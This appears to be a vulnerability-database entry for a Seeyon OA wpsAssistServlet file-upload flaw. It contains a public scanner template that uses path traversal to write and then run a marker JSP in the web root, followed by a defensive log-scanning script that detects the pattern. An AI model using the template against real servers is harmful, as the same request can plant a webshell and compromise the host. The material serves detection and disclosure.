seeyon-wps-assist-servlet-upload: Seeyon OA (致远OA) wpsAssistServlet file upload

Date: 2025-09-01 | Affected software: seeyon | PoC: public

Vulnerability description

Seeyon OA (致远OA) A6, A8, A8N (V8.0SP2, V8.1, V8.1SP1)
Seeyon OA (致远OA) G6, G6N (V8.1, V8.1SP1)
app="致远互联-OA" && title="V8.0SP2"

PoC code [public]

id: seeyon-wps-assist-servlet-upload

info:
  name: 致远OA wpsAssistServlet 文件上传
  author: 123456
  severity: high
  verified: true
  description: |
    致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)
    致远OA G6、G6N (V8.1、V8.1SP1)
    app="致远互联-OA" && title="V8.0SP2"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20wpsAssistServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html

set:
  rfilename: randomLowercase(12)
  r2: randomInt(40000, 44800)
  r3: randomInt(40000, 44800)
  md5str: md5(rfilename)
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{rfilename}}.jsp&fileId=2
      headers:
        Content-Type: "multipart/form-data; boundary=WebKitFormBoundary{{rboundary}}"
      body: "--WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"upload\"; filename=\"123.xls\"\r\nContent-Type: application/vnd.ms-excel\r\n\r\n<% out.println(\"{{md5str}}\");%>\r\n--WebKitFormBoundary{{rboundary}}--\r\n\r\n"
    expression: response.status == 200 && response.body.bcontains(b'"code":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"officeTransResultFlag":') && response.body.bcontains(b'true')
  r1:
    request:
      method: GET
      path: /{{rfilename}}.jsp
    expression: response.status == 200 && response.body.bcontains(bytes(md5str))
expression: r0() && r1()
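
A log-review check for the request pattern in the template above, as an added example (not part of the original page or the template): it flags wpsAssistServlet requests whose realFileType carries path traversal or a JSP extension, then flags later successful GETs for the same file name. The combined log format, the sample lines, the extension list and the function name `scan` are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Sep/2025:10:00:01 +0800] "POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/abcdefghijkl.jsp&fileId=2 HTTP/1.1" 200 87
192.0.2.10 - - [01/Sep/2025:10:00:02 +0800] "GET /abcdefghijkl.jsp HTTP/1.1" 200 33
198.51.100.7 - - [01/Sep/2025:10:05:00 +0800] "POST /seeyon/wpsAssistServlet?flag=save&realFileType=.docx&fileId=2 HTTP/1.1" 200 90
198.51.100.7 - - [01/Sep/2025:10:06:00 +0800] "GET /seeyon/main.do HTTP/1.1" 200 5120
203.0.113.5 - - [01/Sep/2025:11:00:00 +0800] "POST /seeyon/wpsAssistServlet?flag=save&realFileType=%2e%2e%2f%2e%2e%2fROOT%2fprobe.jsp&fileId=2 HTTP/1.1" 200 87
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = (".jsp", ".jspx")  # assumed list of server-executable extensions

def scan(log_text):
    """Return ("upload"|"fetch", client_ip, file_name) tuples in log order."""
    findings, written = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        if url.path.lower().endswith("/wpsassistservlet"):
            # parse_qs percent-decodes the value, so encoded "../" is caught too.
            rft = parse_qs(url.query).get("realFileType", [""])[0]
            rft = rft.replace("\\", "/")
            if "../" in rft or rft.lower().endswith(SCRIPT_EXT):
                name = rft.rsplit("/", 1)[-1]
                written.add(name)
                findings.append(("upload", ip, name))
        elif method == "GET" and status == "200":
            name = url.path.rsplit("/", 1)[-1]
            if name in written:
                findings.append(("fetch", ip, name))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

An "upload" followed by a "fetch" for the same name corresponds to both rules of the template succeeding, so that file should be located on disk and the host treated as compromised.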
